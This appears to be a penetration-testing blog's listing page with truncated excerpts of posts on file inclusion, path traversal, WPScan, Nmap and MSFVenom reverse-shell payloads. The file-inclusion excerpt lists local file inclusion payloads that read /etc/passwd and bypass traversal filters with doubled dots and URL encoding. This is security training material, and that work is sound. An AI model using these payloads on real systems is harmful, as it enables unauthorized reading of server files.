Bharath Narayanasamy

File Inclusion – Cheat Sheet

Local File Inclusion CommandDescription Basic LFI /index.php?language=/etc/passwdBasic LFI /index.php?language=../../../../etc/passwdLFI with path traversal /index.php?language=/../../../etc/passwdLFI with name prefix /index.php?language=./languages/../../../../etc/passwdLFI with approved path LFI Bypasses /index.php?language=....//....//....//....//etc/passwdBypass basic path traversal filter /index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64Bypass filters with URL encoding /index.php?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times]Bypass appended extension with…

Bharath Narayanasamy

WebPentest

Web Vulnerabilities – File Inclusion

Path Traversal Also known as Directory traversal, a web security vulnerability allows an attacker to read operating system resources, such as local files on the server running an application. The attacker…

Bharath Narayanasamy

Enumeration WebPentest

Enumerating WordPress with WPScan

WPScan capabilities The version of WordPress installed and any associated vulnerabilities What plugins are installed and any associated vulnerabilities What themes are installed and any associated vulnerabilities Username enumeration Users…

Bharath Narayanasamy

Enumeration

Nmap

Nmap scan - port states Port StateDescriptionOpenIndicates that an application on the target system is actively accepting connections (TCP/UDP/SCTP) on that port.ClosedIndicates there isn’t any application listening on that port.FilteredNmap…

Bharath Narayanasamy

RED TEAM

MSFVenom Cheatsheet for Reverse_Shell Payloads

Non-Meterpreter We can execute the msfvenom --list-payloads command to see a brief description about all of the payloads msfvenom can offer, if we want to know specific information about the…

Bharath Narayanasamy